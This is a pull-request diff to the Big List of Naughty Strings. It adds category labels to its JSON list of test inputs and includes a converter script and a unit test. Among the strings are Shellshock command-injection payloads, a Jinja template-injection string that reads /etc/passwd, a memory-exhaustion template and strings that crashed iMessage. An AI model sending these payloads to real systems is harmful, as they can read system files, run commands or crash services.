+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "() { 0; }; touch /tmp/blns.shellshock1.fail;"
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }"
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "<<< %s(un='%s') = %u"
+  },
+  {
+    "category": "Strings that test for known vulnerabilities",
+    "string": "+++ATH0"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "CON"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "PRN"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "AUX"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "CLOCK$"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "NUL"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "A:"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "ZZ:"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM1"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT1"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT2"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "LPT3"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM2"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM3"
+  },
+  {
+    "category": "Strings which are reserved characters in MSDOS/Windows",
+    "string": "COM4"
+  },
+  {
+    "category": "Strings that may occur on IRC clients that make security products freak out",
+    "string": "DCC SEND STARTKEYLOGGER 0 0 0"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Scunthorpe General Hospital"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Penistone Community Church"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Lightwater Country Park"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Jimmy Clitheroe"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Horniman Museum"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "shitake mushrooms"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "RomansInSussex.co.uk"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "http://www.cum.qc.ca/"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Craig Cockburn, Software Specialist"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Linda Callahan"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Dr. Herman I. Libshitz"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "magna cum laude"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Super Bowl XXX"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "medieval erection of parapets"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "evaluate"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "mocha"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "expression"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Arsenal canal"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "classic"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Tyson Gay"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "Dick Van Dyke"
+  },
+  {
+    "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+    "string": "basement"
+  },
+  {
+    "category": "Strings which may cause human to reinterpret worldview",
+    "string": "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you."
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue"
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "But now...\u001b[20Cfor my greatest trick...\u001b[8m"
+  },
+  {
+    "category": "Strings which punish the fools who use cat/type on this file",
+    "string": "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]"
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗"
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "🏳0🌈️"
+  },
+  {
+    "category": "Strings which crashed iMessage in various versions of iOS",
+    "string": "జ్ఞ‌ా"
+  },
+  {
+    "category": "This is a four characters string which includes Persian special characters (گچپژ)",
+    "string": "گچپژ"
+  },
+  {
+    "category": "second, obviously, prints contents of /etc/passwd",
+    "string": "{% print 'x' * 64 * 1024**3 %}"
+  },
+  {
+    "category": "second, obviously, prints contents of /etc/passwd",
+    "string": "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
+  }
 ]

--- a/scripts/generate_json_with_categories.py
+++ b/scripts/generate_json_with_categories.py
@@ -1,0 +1,38 @@
+import json
+import base64
+import os
+
+def parse_blns(input_txt, output_json, add_base64=False):
+    result = []
+    current_cat = "Uncategorized"
+
+    with open(input_txt, encoding="utf-8") as f:
+        for line in f:
+            line = line.strip()
+            if not line:
+                continue
+            if line.startswith("#"):
+                current_cat = line.lstrip("#").strip()
+            else:
+                entry = {
+                    "category": current_cat,
+                    "string": line
+                }
+                if add_base64:
+                    entry["base64"] = base64.b64encode(line.encode()).decode()
+                result.append(entry)
+
+    with open(output_json, "w", encoding="utf-8") as f:
+        json.dump(result, f, ensure_ascii=False, indent=2)
+
+
+if __name__ == "__main__":
+    root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+    blns_txt = os.path.join(root, "blns.txt")
+    blns_json = os.path.join(root, "blns.json")
+    blns_base64_json = os.path.join(root, "blns.base64.json")
+
+    parse_blns(blns_txt, blns_json)
+    parse_blns(blns_txt, blns_base64_json, add_base64=True)
+
+    print("✅ JSON files generated with categories.")

--- a/tests/test.py
+++ b/tests/test.py
@@ -1,0 +1,13 @@
+import json
+from scripts import parse_blns
+
+def test_categories_and_strings(tmp_path):
+    txt = tmp_path / "blns.txt"
+    txt.write_text("# Cat1\nfoo\n# Cat2\nbar\n")
+    out = tmp_path / "blns.cat.json"
+    parse_blns(str(txt), str(out))
+    data = json.loads(out.read_text())
+    assert data == [
+        {"category": "Cat1", "string": "foo"},
+        {"category": "Cat2", "string": "bar"},
+    ]


### PR DESCRIPTION
This PR adds category metadata to the blns.json and blns.base64.json outputs based on the section headers from blns.txt.

✅ Changes:
- Added scripts/generate_json_with_categories.py for converting categorized .txt to .json
- Replaced blns.json and blns.base64.json with structured objects
- Each JSON entry now includes a "category" field (and base64 if applicable)

Fixes #267